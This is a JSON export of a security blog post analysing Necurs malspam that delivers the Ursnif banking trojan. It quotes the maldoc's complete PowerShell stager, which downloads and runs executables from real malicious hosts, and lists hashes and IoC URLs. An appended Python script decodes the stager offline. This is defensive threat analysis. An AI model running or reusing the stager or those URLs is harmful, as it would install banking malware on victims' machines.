{"id":56,"date":"2018-07-11T13:42:08","date_gmt":"2018-07-11T12:42:08","guid":{"rendered":"http:\/\/fortgale.com\/news\/?p=56"},"modified":"2026-06-08T09:34:54","modified_gmt":"2026-06-08T09:34:54","slug":"necurs-botnet","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/necurs-botnet\/","title":{"rendered":"Necurs Botnet &amp; Banking Trojans"},"content":{"rendered":"<p style=\"text-align: justify\">The Cisco Talos Team shared their analysis of the latest Malspam wave distributed by the Necurs Botnet (<a href=\"https:\/\/blog.talosintelligence.com\/2018\/01\/the-many-tentacles-of-necurs-botnet.html\">link<\/a>).<\/p>\n<p style=\"text-align: justify\">Necurs is among the most active botnets globally, capable of generating massive volumes of spam. The malicious emails delivered by this campaign carry Ransomware and Banking Trojans \u2014 specifically <strong>Ursnif<\/strong>, <strong>Panda Banker<\/strong>, and <strong>Emotet<\/strong>.<\/p>\n<p style=\"text-align: justify\">Opening the malicious document and enabling its content (Macro execution) triggers the system compromise chain.<\/p>\n<p style=\"text-align: justify\">The following is a brief analysis of the <strong>Ursnif<\/strong> banking malware:<\/p>\n<p style=\"text-align: justify\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/07\/Screenshot-165-300x137.png\" alt=\"\" width=\"300\" height=\"137\" class=\"size-medium wp-image-58 alignleft\" style=\"font-size: 14px\" loading=\"lazy\" \/><br \/>\nThe malicious attachment is a <code>.doc<\/code> file named: <code>[COMPANYNAME]_Request - [Employee Surname].doc<\/code><\/p>\n<p style=\"text-align: justify\">Opening the file and enabling content launches a PowerShell command with the following parameters:<\/p>\n<blockquote><p>$VeZynUhagoWemyROVeJ = 
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(\"aAB0AHQAcAA6AC8ALwBjAG8AZABlAHIAbwBuAGYAbwBkAGEALgBjAG8AbQAvAGIAcgBlAGUAcABpAHQAYQBsADIANwAvAHkAeQB5AGoALgBnAGUAcgA\/AHYAYQBzAHkAZwBhAHIAdQBiAD0AdwBpAHoAYQBoAG8AegBlACYAYQBhAG4AaQB4AG8AaAB1AD0AawB1AGsAJgByAGEAdABhAHgAPQBoAHkAaQB1AHMAaQBwAHUAaQBhACYAcABvAGMAYQB4AGUAbQBvAGsAPQB6AHUAJgByAGUAdwBpAHgAeQBkAGEAPQB0AGUAZAB1AHMAbwB6AGEAbQA=\"));(New-Object System.Net.WebClient).DownloadFile($VeZynUhagoWemyROVeJ, $env:APPDATA + '\\valabyhuh.exe'); Start-Process $env:APPDATA'\\valabyhuh.exe';Write-Host \"bAbYgiramOpEPY\";$iARAPUmOPaJeS = New-Object System.Net.NetworkCredential(\"lUpIaaKAXuqexOGybu\",\"lUpIaaKAXuqexOGybu\").SecurePassword;(New-Object System.Net.WebClient).DownloadFile('http:\/\/91.210.104.247\/porn.jpg', $env:APPDATA + '\\stat.exe'); Write-Host \"FYFopIsYpUjurof\";Start-Process $env:APPDATA'\\stat.exe';$jOCOdeFOLUXALoNA = \"nuqoLuSAwEjOdE\",\"iiQOCOhERiJYsyie\",\"qIhyGAtYlebimycuaUf\",\"bYtURYGunUtiKe\",\"pazuWeXOQoFIzIQUaUhe\";Exit;<\/p><\/blockquote>\n<p style=\"text-align: justify\">The stager decodes a UTF-16LE Base64 string (the <code>[System.Text.Encoding]::Unicode<\/code> call) into the first download URL, then fetches two executables into <code>%APPDATA%<\/code> with <code>WebClient.DownloadFile<\/code> and launches each with <code>Start-Process<\/code>. The <code>Write-Host<\/code> strings, the unused <code>NetworkCredential<\/code> object and the unused string array assigned to <code>$jOCOdeFOLUXALoNA<\/code> are filler that has no effect on the infection chain. The two files dropped are:<\/p>\n<ul style=\"text-align: justify\">\n<li><code>valabyhuh.exe<\/code>\n<ul>\n<li>MD5: &nbsp;&nbsp;&nbsp;&nbsp;<code>fa37eb66b10eb030e777af9420ffce9a<\/code><\/li>\n<li>SHA1: &nbsp;&nbsp;<code>92b86fcdb6bc0fcdbb60478e41456d5b565410ce<\/code><\/li>\n<li>SHA256: <code>856e8c8716fa5afac747efcd8acfe1488c703f1b8620dd567b2b7543458c5d69<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul style=\"text-align: justify\">\n<li><code>stat.exe<\/code>\n<ul>\n<li>MD5: &nbsp;&nbsp;&nbsp;&nbsp;<code>2ca1f87a624245db0a57bf439b71d460<\/code><\/li>\n<li>SHA1: &nbsp;&nbsp;<code>2f6de1b66d8021b74ebcee0040b9a7c00b61d231<\/code><\/li>\n<li>SHA256: 
<code>06af68780ff670177daf0d6e34918976a46f9e69787a284b8757470fb02903b3<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify\">Network traffic generated:<\/p>\n<p style=\"text-align: justify\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/07\/Screenshot-166-300x35.png\" alt=\"\" width=\"771\" height=\"90\" class=\"alignnone wp-image-59\" style=\"font-size: 14px\" loading=\"lazy\" \/><\/p>\n<p style=\"text-align: justify\">Indicators of Compromise:<\/p>\n<ul style=\"text-align: justify\">\n<li><code>http:\/\/coderonfoda.com\/breepital27\/yyyj.ger?vasygarub=wizahoze&amp;aanixohu=kuk&amp;ratax=hyiusipuia&amp;pocaxemok=zu&amp;rewixyda=tedusozam<\/code> (first download, decoded from the Base64 argument in the PowerShell stager above; saved and executed as <code>%APPDATA%\\valabyhuh.exe<\/code>)<\/li>\n<li><code>http:\/\/91.210.104.247\/porn.jpg<\/code> (second download, served under an image name; saved and executed as <code>%APPDATA%\\stat.exe<\/code>)<\/li>\n<li><code>http:\/\/91.210.104.247\/emotet.txt<\/code> (GrandSoft EK related)<\/li>\n<li><code>http:\/\/45.227.252.241\/linnealva\/kitea.dlm<\/code><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>The Cisco Talos Team shared their analysis of the latest Malspam wave distributed by the Necurs Botnet (link). Necurs is among the most active botnets globally, capable of generating massive volumes of spam. The malicious emails delivered by this campaign carry Ransomware and Banking Trojans \u2014 specifically Ursnif, Panda Banker, and Emotet. 
Opening the malicious &#8230; <a title=\"Necurs Botnet &amp; Banking Trojans\" class=\"read-more\" href=\"https:\/\/fortgale.com\/blog\/emerging-threats\/necurs-botnet\/\" aria-label=\"Read more about Necurs Botnet &amp; Banking Trojans\">Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":61,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[48,125,161,242,362,368],"class_list":["post-56","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","tag-banker","tag-emotet","tag-grandsoft","tag-necurs","tag-trojan","tag-ursnif"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/56","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=56"}],"version-history":[{"count":1,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/56\/revisions"}],"predecessor-version":[{"id":9811,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/56\/revisions\/9811"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=56"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=56"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=56"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
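The decoding step of the PowerShell stager quoted in the post, as an added worked example (this is not code from the post or from Talos): a short Python script that reverses the stager's `FromBase64String` + `[System.Text.Encoding]::Unicode.GetString` pair (UTF-16LE), resolves the variable passed to the first `DownloadFile` call, and lists the URL / dropped-file pairs, the `Start-Process` targets and the hosts contacted. The stager text is re-typed from the post with the blog's curly quotes turned back into straight quotes; the regexes and function names are this example's own, and they assume the `DownloadFile($src, $env:APPDATA + '\name')` and `Start-Process $env:APPDATA'\name'` forms shown on the page.

```python
"""Decode the Ursnif maldoc's PowerShell stager and list its download / drop IoCs.

Added example, not code from the post. STAGER is re-typed from the post
(smart quotes normalised); regex and function names are this example's own.
"""
import base64
import re
from urllib.parse import urlsplit

# Base64 argument copied from the stager. It is UTF-16LE text because the
# stager decodes it with [System.Text.Encoding]::Unicode.
STAGER_B64 = (
    "aAB0AHQAcAA6AC8ALwBjAG8AZABlAHIAbwBuAGYAbwBkAGEALgBjAG8AbQAvAGIAcgBlAGUAcABpAHQAYQBsADIANwAv"
    "AHkAeQB5AGoALgBnAGUAcgA/AHYAYQBzAHkAZwBhAHIAdQBiAD0AdwBpAHoAYQBoAG8AegBlACYAYQBhAG4AaQB4AG8A"
    "aAB1AD0AawB1AGsAJgByAGEAdABhAHgAPQBoAHkAaQB1AHMAaQBwAHUAaQBhACYAcABvAGMAYQB4AGUAbQBvAGsAPQB6"
    "AHUAJgByAGUAdwBpAHgAeQBkAGEAPQB0AGUAZAB1AHMAbwB6AGEAbQA="
)

# The stager as quoted in the post, with WordPress curly quotes turned back into
# the straight quotes PowerShell actually received (constructed sample input).
STAGER = (
    "$VeZynUhagoWemyROVeJ = [System.Text.Encoding]::Unicode.GetString("
    '[System.Convert]::FromBase64String("' + STAGER_B64 + '"));'
    "(New-Object System.Net.WebClient).DownloadFile($VeZynUhagoWemyROVeJ, $env:APPDATA + '\\valabyhuh.exe'); "
    "Start-Process $env:APPDATA'\\valabyhuh.exe';Write-Host \"bAbYgiramOpEPY\";"
    '$iARAPUmOPaJeS = New-Object System.Net.NetworkCredential("lUpIaaKAXuqexOGybu","lUpIaaKAXuqexOGybu").SecurePassword;'
    "(New-Object System.Net.WebClient).DownloadFile('http://91.210.104.247/porn.jpg', $env:APPDATA + '\\stat.exe'); "
    "Write-Host \"FYFopIsYpUjurof\";Start-Process $env:APPDATA'\\stat.exe';"
    '$jOCOdeFOLUXALoNA = "nuqoLuSAwEjOdE","iiQOCOhERiJYsyie","qIhyGAtYlebimycuaUf","bYtURYGunUtiKe","pazuWeXOQoFIzIQUaUhe";Exit;'
)

# $var = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("..."))
ASSIGN_RE = re.compile(
    r'(\$\w+)\s*=\s*\[System\.Text\.Encoding\]::Unicode\.GetString\('
    r'\[System\.Convert\]::FromBase64String\("([A-Za-z0-9+/=]+)"\)\)'
)
# ...DownloadFile(<'literal url'> or <$var>, $env:APPDATA + '\<file>')
DOWNLOAD_RE = re.compile(
    r"DownloadFile\(\s*(\$\w+|'[^']*')\s*,\s*\$env:APPDATA\s*\+\s*'\\([^'\\]+)'\s*\)"
)
# Start-Process $env:APPDATA'\<file>'
START_RE = re.compile(r"Start-Process\s+\$env:APPDATA'\\([^'\\]+)'")


def decode_unicode_b64(blob):
    """Reverse FromBase64String followed by Encoding.Unicode.GetString (UTF-16LE)."""
    return base64.b64decode(blob).decode("utf-16-le")


def extract_downloads(script):
    """Return (url, dropped file name) pairs in script order.

    A DownloadFile source that is a variable is resolved through the Base64
    assignments found in the script; an unknown variable is kept as a marker
    rather than silently dropped.
    """
    resolved = {var: decode_unicode_b64(b64) for var, b64 in ASSIGN_RE.findall(script)}
    pairs = []
    for src, name in DOWNLOAD_RE.findall(script):
        url = resolved.get(src, "<unresolved %s>" % src) if src.startswith("$") else src.strip("'")
        pairs.append((url, name))
    return pairs


def extract_executed(script):
    """File names handed to Start-Process from %APPDATA%, in script order."""
    return START_RE.findall(script)


def hostnames(pairs):
    """Network IoCs: the host part of every resolved download URL, sorted."""
    return sorted({urlsplit(url).netloc for url, _ in pairs if url.startswith("http")})


if __name__ == "__main__":
    downloads = extract_downloads(STAGER)
    for url, name in downloads:
        print("%-16s <- %s" % (name, url))
    print("executed:", extract_executed(STAGER))
    print("hosts:", hostnames(downloads))
```

Resolving the variable rather than just grepping for `http` matters here: the first URL never appears in clear text in the stager, so a plain string search over the command line would only surface the second download and miss the host that delivers `valabyhuh.exe`.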